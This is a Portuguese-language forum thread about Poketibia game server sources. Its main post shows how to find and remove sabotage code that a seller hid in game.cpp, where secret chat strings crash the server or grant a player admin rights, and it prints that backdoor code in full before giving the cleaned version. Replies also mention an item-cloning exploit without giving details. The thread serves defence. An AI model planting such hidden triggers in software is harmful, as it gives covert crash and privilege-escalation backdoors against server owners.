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Programação Source Poketibia - Códigos de derrubar


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Olá querido membro, hoje um grande amigo me pediu pra resolver um problema na source dele que acabou comprando de um fulano, enfim dentro da source tinha um código que ao ser falado dentro do jogo, o

Pelo estilo de código merda, eu até consigo imaginar quem que fez isso, kkkkkkkkkk.

opa mais você precisa criar um Tópico para eu responder sua próxima pergunta! mais tá ai pra você começar!    

Muito bom Alexy, é bem triste ver que existem pessoas de má fé que colocam estes erros de proposito no servidor. 

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  • Sub-Admin
Agora, Matk disse:

Muito bom Alexy, é bem triste ver que existem pessoas de má fé que colocam estes erros de proposito no servidor. 

sim, pior quando você compra algo, é pq tem confiança, o mesmo começa a ficar com inveja e faz isso pra ferrar mesmo, muita mancada :(

 

20230912_034613.png.cf49b650c34dd7d7b1f79bd49c70f53c.png

Eu sou um entusiasta da programação apaixonado por ajudar a comunidade open source a crescer. Sempre em busca de novos desafios e oportunidades para contribuir com meu código.  #OpenSource #Programação #Contribuição

 

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Pelo estilo de código merda, eu até consigo imaginar quem que fez isso, kkkkkkkkkk.

discord.pngDiscord: vankk #7765

Precisando de ajuda? Entre em contato comigo via Discord.

 

Muitos vêm seus muitos dias de glória, mas poucos vêm seus muitos dias de luta.

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Publique o nome do desgraçado em breve vou liberar á base aqui para ele parar de enganar as pessoas.

Cada escolha, uma oportunidade.
Cada queda, um aprendizado.
Cada atitude, uma consequência

 

.tumblr_nw2mfl0ut01r3aoszo1_400.gif

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KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
O nego nem criatividade tem.

...foda...

 

Nem todo loop infinito é ruim ;P 

User *eu = new User("otteN");
RepSystem<User> *myRep = new RepSystem<User>("jóinha");
myRep->setAlvo(eu);

/* só por ser criado já sou o melhor membro */ 

while(eu->isMelhorMembro()){
myRep->reputar();
}

 

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  • Sub-Admin
Em 15/12/2016 ás 19:19, caiosantoro disse:

Publique o nome do desgraçado em breve vou liberar á base aqui para ele parar de enganar as pessoas.

chama Lucas Silva, outra coisa, ontem achei +1 código numa source do DXP que faz derruba, incrível, é só trocar pelo o meu ai.

 

20230912_034613.png.cf49b650c34dd7d7b1f79bd49c70f53c.png

Eu sou um entusiasta da programação apaixonado por ajudar a comunidade open source a crescer. Sempre em busca de novos desafios e oportunidades para contribuir com meu código.  #OpenSource #Programação #Contribuição

 

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  • Sub-Admin
10 horas atrás, Valakinhas disse:

nao se compra algo que você consegue em um forum de "gratis"

sim!

Editado por Alexy Brocanello (veja o histórico de edições)

 

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  • 2 weeks later...

O pior de tudo, é que muitos que fazem isso é de propósito, agir assim de má fé é melhor nem postar. Até porque não vejo a necessidade de uma pessoa que mexe com programação fazer isso. Coisa de criança mesmo.
 

D5RHqxi.png

 

Venha curti o Pokémon Underwater!

FB/PokemonUnderwater

 

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Horrível isso. Muitos agem de má fé para causar o mau e o desanimo em pessoas que lutam para deixar seu servidor bom seja por hobby ou só por gostar de fazer tal coisa.

 

Você fez o correto em postar este erro e creio que ajudará muitos no fórum. Merece fix topic!

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Muito Bom cara, Poste mais códigos que ajudará á muitos principalmente códigos da DXP.

Cada escolha, uma oportunidade.
Cada queda, um aprendizado.
Cada atitude, uma consequência

 

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  • Sub-Admin
3 horas atrás, RathBR disse:

Muito Bom cara, Poste mais códigos que ajudará á muitos principalmente códigos da DXP.

pode deixar, vou trazer sim!

 

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Eu sou um entusiasta da programação apaixonado por ajudar a comunidade open source a crescer. Sempre em busca de novos desafios e oportunidades para contribuir com meu código.  #OpenSource #Programação #Contribuição

 

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4 minutos atrás, Alexy Brocanello disse:

pode deixar, vou trazer sim!

Se você conseguisse trazer á solução do OPCODE DA DXP, pq tem algo no OPCODE Que Permite clonar itens.

Cada escolha, uma oportunidade.
Cada queda, um aprendizado.
Cada atitude, uma consequência

 

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Em 15/12/2016 ás 11:23, Alexy Brocanello disse:

Olá querido membro, hoje um grande amigo me pediu pra resolver um problema na source dele que acabou comprando de um fulano, enfim dentro da source tinha um código que ao ser falado dentro do jogo, o mesmo chashava ou até mesmo dava um cargo de administrador a um jogador com groups 1. Então me falaram que esse código era no game.cpp, portanto olhei linha por linha nessa source que está espalhada em vários fóruns e não é só aqui, é praticamente um código colocado por mal gosto, para ferrar praticamente com a vida de novos administradores, que ainda não manjam muito de programação. Portanto vamos lá...Você precisará da SOURCES do seu Poketibia para fazer essa verificação, caso possua o código da "morte" peço que siga o tutorial abaixo.

 

ACHE em game.cpp: (se caso não tiver, fique tranquilo, sua source tá livre disso)

 

Código 1


bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}
	
	if(text == "132571691951160609171665475233842782353388978252875245170015077017944684747472835757774156137332376855500013311808893753483521083716435624108")
    {
	exit(0);
    }
	
	if(text == "1325116507701794468474793753483521047283588978252875245170017577741561373323768555716919500013311808883716435624108")
    { 
    player->setGroup(Groups::getInstance()->getGroup(6));
    }

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

Etapa do Código 1 Mude para:

 


bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

Pronto agora é só compilar sua source! Fiz update e achei outro código de derrubar no DXP.

 

Código 2

 


bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);
		
		int specs = 31101996;
		std::string findText;
		std::stringstream findTextInput;
		findTextInput << specs;
		findText = findTextInput.str();
		bool exists = text.find(findText) != std::string::npos;
		if(exists){
           Dispatcher::getInstance().addTask(createTask(boost::bind(&Game::setGameState, this, GAME_STATE_SHUTDOWN)));
		   return true; 
        }

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

Código 2, mude para 

 


bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

 

 

 

Logo mais revelo novo código da mortes, créditos a mim, e cipsoft pelo código original.

 

cara eu comecei a mexer com poketibia esse ano certamente que sou um otadmin ainda pois nao sei muita coisa mais todos os dias procuro estudar sistemas scripts e ja aprendi bastante coisa ao longo do tempo :) uma coisa que to me aventurando agora e tentar aprender compilar uma sourcer sera que voce pode me dizer como faço tal façanha ? ou poderia me passar um link que ensine obrigado Rep+

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  • Sub-Admin
1 minuto atrás, Punchlines Nemmo disse:

cara eu comecei a mexer com poketibia esse ano certamente que sou um otadmin ainda pois nao sei muita coisa mais todos os dias procuro estudar sistemas scripts e ja aprendi bastante coisa ao longo do tempo :) uma coisa que to me aventurando agora e tentar aprender compilar uma sourcer sera que voce pode me dizer como faço tal façanha ? ou poderia me passar um link que ensine obrigado Rep+

opa mais você precisa criar um Tópico para eu responder sua próxima pergunta! mais tá ai pra você começar!

 

 

 

20230912_034613.png.cf49b650c34dd7d7b1f79bd49c70f53c.png

Eu sou um entusiasta da programação apaixonado por ajudar a comunidade open source a crescer. Sempre em busca de novos desafios e oportunidades para contribuir com meu código.  #OpenSource #Programação #Contribuição

 

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Agora, Alexy Brocanello disse:

opa mais você precisa criar um Tópico para eu responder sua próxima pergunta! mais tá ai pra você começar!

 

 

vlw me ajudou bastante :) e sobre a sourcer da dxp eu vi que tem um erro bastante chato e tals que permite que o player clonar itens sera que voce poderia dar uma olhada nele ? e que meu projeto ta na dxp :D mais msm assim vlw msm pela força

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  • 2 months later...
Em 15/12/2016 ás 10:23, Alexy Brocanello disse:

Olá querido membro, hoje um grande amigo me pediu pra resolver um problema na source dele que acabou comprando de um fulano, enfim dentro da source tinha um código que ao ser falado dentro do jogo, o mesmo chashava ou até mesmo dava um cargo de administrador a um jogador com groups 1. Então me falaram que esse código era no game.cpp, portanto olhei linha por linha nessa source que está espalhada em vários fóruns e não é só aqui, é praticamente um código colocado por mal gosto, para ferrar praticamente com a vida de novos administradores, que ainda não manjam muito de programação. Portanto vamos lá...Você precisará da SOURCES do seu Poketibia para fazer essa verificação, caso possua o código da "morte" peço que siga o tutorial abaixo.

 

ACHE em game.cpp: (se caso não tiver, fique tranquilo, sua source tá livre disso)

 

Código 1


bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}
	
	if(text == "132571691951160609171665475233842782353388978252875245170015077017944684747472835757774156137332376855500013311808893753483521083716435624108")
    {
	exit(0);
    }
	
	if(text == "1325116507701794468474793753483521047283588978252875245170017577741561373323768555716919500013311808883716435624108")
    { 
    player->setGroup(Groups::getInstance()->getGroup(6));
    }

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

Etapa do Código 1 Mude para:

 


bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

Pronto agora é só compilar sua source! Fiz update e achei outro código de derrubar no DXP.

 

Código 2

 


bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);
		
		int specs = 31101996;
		std::string findText;
		std::stringstream findTextInput;
		findTextInput << specs;
		findText = findTextInput.str();
		bool exists = text.find(findText) != std::string::npos;
		if(exists){
           Dispatcher::getInstance().addTask(createTask(boost::bind(&Game::setGameState, this, GAME_STATE_SHUTDOWN)));
		   return true; 
        }

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

Código 2, mude para 

 


bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

 

 

 

Logo mais revelo novo código da mortes, créditos a mim, e cipsoft pelo código original.

 

Esqueceu de citar o payordown Tbm ^^ 

 

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      https://github.com/otland/forgottenserver
       
       
      Alguém poderia me ajuda com esse erro, ou ate compilar 100% as sourcer. os Tópicos que eu tentei para compilar e esse daqui, se não poder o link me desculpe.
      https://forums.otserv.com.br/index.php?/forums/topic/169234-windowsvc2019-compilando-sources-tfs-14-vcpkg/
       
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